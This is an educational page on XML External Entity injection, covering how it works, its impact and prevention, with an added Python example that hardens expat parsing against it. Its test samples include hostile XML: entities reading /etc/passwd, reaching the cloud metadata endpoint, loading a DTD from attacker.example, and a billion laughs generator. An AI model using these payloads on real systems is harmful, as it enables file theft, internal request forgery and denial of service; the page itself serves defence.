What is XXE (XML External Entity injection)?
Last reviewed June 2, 2026
XXE, or XML External Entity injection (CWE-611), is a vulnerability where an XML parser, fed untrusted XML, resolves external entity references declared in that document's DTD. An attacker can use these entities to read local files, trigger server-side requests to internal systems, or cause denial of service. The fix is to disable document type definitions, or at minimum external entity resolution, in the parser.
What XXE is
XML External Entity injection happens when an application parses XML that defines external entities and the parser resolves them. XML supports a document type definition, or DTD, that can declare entities. An external entity points to a resource outside the document, such as a file path or a URL.
When a parser is configured to resolve external entities and the XML comes from an untrusted source, an attacker can declare entities that make the parser fetch local files or remote resources, then reflect or leak their contents.
How XXE works
- The application accepts XML from a user, an upload, or an API request and passes it to an XML parser.
- The parser is configured to process DTDs and resolve external entities, which is still the default in some libraries and was the default in many older ones.
- The attacker submits XML that declares an external entity pointing at a local file or an internal URL.
- When the entity is expanded, the parser reads that resource, and its contents may be returned in a response, logged, or used to reach internal services.
Impact of XXE
- File disclosure, where local files such as configuration or credential files are read off the server.
- Server-side request forgery, where the parser is coerced into making requests to internal hosts and cloud metadata endpoints.
- Denial of service, including the billion laughs attack, where nested entity expansion consumes memory and CPU.
- In some configurations, port scanning of internal networks or interaction with other backend services.
How to prevent XXE
- Disable document type definitions entirely in the XML parser (in the Java/Xerces family this is the disallow-doctype-decl feature), which prevents external and internal entity attacks at the source.
- If DTDs cannot be disabled, explicitly disable external general entities and external parameter entities, disable loading of external DTDs, and keep the parser's entity expansion limits in place so internal entities cannot be abused for denial of service.
- Use less complex data formats such as JSON where possible and avoid serializing sensitive data into XML.
- Keep XML parsing libraries patched, since safe defaults have improved over time but older versions remain risky.
- Validate XML against a known schema and apply server-side controls that limit outbound requests, but treat both as defense in depth: entity resolution happens during parsing, before validation runs, so neither replaces disabling DTDs.
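The following is an added example, not code from the original page. It puts the attack chain above and the two prevention postures side by side using the Python standard library's expat bindings: by default it refuses any DOCTYPE (the "disable DTDs" posture), and in allow_dtd mode it keeps internal entities but rejects external entities, parameter entities, external DTD subsets, and internal entities whose expansion exceeds a cap, which is the billion laughs pattern. The sample documents, the attacker host attacker.example, the MAX_EXPANSION limit and the function names are all constructed for the example.

```python
"""Hardened XML parsing for untrusted input, built on xml.parsers.expat.

Added example, not code from the original page. Sample documents, the host
attacker.example and the MAX_EXPANSION cap are constructed/assumed values.
"""
import re
import xml.parsers.expat as expat

MAX_EXPANSION = 10_000  # assumed cap: bytes one entity may expand to
_ENTITY_REF = re.compile(r"&([A-Za-z_:][\w.:-]*);")  # general entity refs only


class XXEBlocked(Exception):
    """Raised when the document tries something the policy forbids."""


def _expansion_size(name, entities, visiting=()):
    """Bytes that entity `name` expands to, following nested references."""
    if name in visiting:  # recursive entity: illegal XML, never expand it
        raise XXEBlocked("blocked: expansion")
    value = entities.get(name)
    if value is None:  # unknown or predefined entity: stays as literal text
        return len(name) + 2
    size, last = 0, 0
    for m in _ENTITY_REF.finditer(value):
        size += m.start() - last
        size += _expansion_size(m.group(1), entities, visiting + (name,))
        last = m.end()
    return size + len(value) - last


def parse_untrusted(data: bytes, allow_dtd: bool = False):
    """Parse untrusted XML; return [(tag, text)] in end-tag order or raise XXEBlocked."""
    parser = expat.ParserCreate()
    parser.buffer_text = True
    # Parameter entities are never expanded (expat's default, made explicit).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    entities, stack, out = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise XXEBlocked("blocked: doctype")  # safest posture: no DTD at all
        if system_id is not None or public_id is not None:
            raise XXEBlocked("blocked: external-dtd")  # <!DOCTYPE x SYSTEM "..."> fetches a DTD

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # SYSTEM/PUBLIC identifiers make the parser read a file or URL (file
        # disclosure, SSRF); %param; entities are the usual blind/OOB vehicle.
        if is_param or system_id is not None or public_id is not None:
            raise XXEBlocked("blocked: entity")
        entities[name] = value  # expat passes the literal value, refs unexpanded
        if _expansion_size(name, entities) > MAX_EXPANSION:
            raise XXEBlocked("blocked: expansion")  # billion laughs caught at declaration

    def on_external_ref(context, base, system_id, public_id):
        raise XXEBlocked("blocked: entity")  # belt and braces: never resolve externals

    def on_text(text):
        if stack:
            stack[-1][1].append(text)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda tag, attrs: stack.append([tag, []])
    parser.CharacterDataHandler = on_text
    parser.EndElementHandler = lambda tag: out.append((tag, "".join(stack.pop()[1])))
    parser.Parse(data, True)
    return out


def check(data: bytes, allow_dtd: bool = False) -> str:
    """Return 'ok' or the blocking reason, handy for logging or tests."""
    try:
        parse_untrusted(data, allow_dtd)
        return "ok"
    except XXEBlocked as e:
        return str(e)


def billion_laughs(depth: int = 9) -> bytes:
    """Constructed billion laughs document: 10**depth copies of 'lol'."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        ref = "&lol;" if i == 1 else f"&lol{i - 1};"
        decls.append(f'<!ENTITY lol{i} "{ref * 10}">')
    return f'<!DOCTYPE d [{"".join(decls)}]><d>&lol{depth};</d>'.encode()


# Constructed sample documents covering the cases discussed on the page.
BENIGN = b"<order><item>widget</item></order>"
HARMLESS_DTD = b'<!DOCTYPE d [<!ENTITY co "ACME">]><d>&co; Ltd</d>'
FILE_XXE = b'<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>'
SSRF_XXE = b'<!DOCTYPE d [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">]><d>&x;</d>'
BLIND_XXE = b'<!DOCTYPE d [<!ENTITY % p SYSTEM "http://attacker.example/evil.dtd"> %p;]><d/>'
EXTERNAL_DTD = b'<!DOCTYPE d SYSTEM "http://attacker.example/x.dtd"><d/>'

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file", FILE_XXE), ("ssrf", SSRF_XXE),
                       ("blind", BLIND_XXE), ("ext-dtd", EXTERNAL_DTD),
                       ("lol", billion_laughs()), ("harmless-dtd", HARMLESS_DTD)]:
        print(f"{label:13} no-dtd={check(doc):20} allow-dtd={check(doc, True)}")
```

The default mode is the one to ship: every hostile sample is rejected at the DOCTYPE before any entity is even declared. The allow_dtd mode shows what "if DTDs cannot be disabled" costs: each remaining attack class needs its own check, and the expansion cap has to be enforced at declaration time, because by the time the reference in the body is expanded the damage is already being done.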
Keep exploring
- CWE-611: XML External Entity Reference. The Common Weakness Enumeration entry for XXE.
- What is server-side request forgery? A common consequence when XXE coerces internal requests.
- What is the OWASP Top 10? Where XXE sits within widely used risk rankings.
- What is path traversal? Another technique used to read files off a server.
- What is a CWE? How weaknesses like CWE-611 are catalogued.
- CWE directory. Browse the full Common Weakness Enumeration.
Frequently asked questions
- Where does XXE appear in the OWASP Top 10?
- XXE was its own category in the 2017 OWASP Top 10 (A4:2017, XML External Entities). In the 2021 list it was folded into the broader A05:2021 Security Misconfiguration category, since unsafe XML parser configuration is the underlying cause.
- What is the billion laughs attack?
- It is an XML denial-of-service attack that defines a small set of nested internal entities, each referencing the previous one many times. When the parser expands them, the data grows exponentially, exhausting memory and CPU even though the input file is tiny. Strictly it uses internal rather than external entities, but it is grouped with XXE because the same DTD processing enables it and disabling DTDs stops both.
- Can XXE happen without returning data to the attacker?
- Yes. Blind XXE occurs when the response does not echo the entity contents. Attackers can still confirm and exploit it through out-of-band techniques, typically a parameter entity that loads an attacker-hosted DTD, which in turn makes the parser send the data in an outbound request the attacker observes on their own server.
- How is XXE related to server-side request forgery?
- An external entity can point at an internal URL, so the XML parser itself makes the request. This turns XXE into a vector for server-side request forgery, including access to cloud metadata services.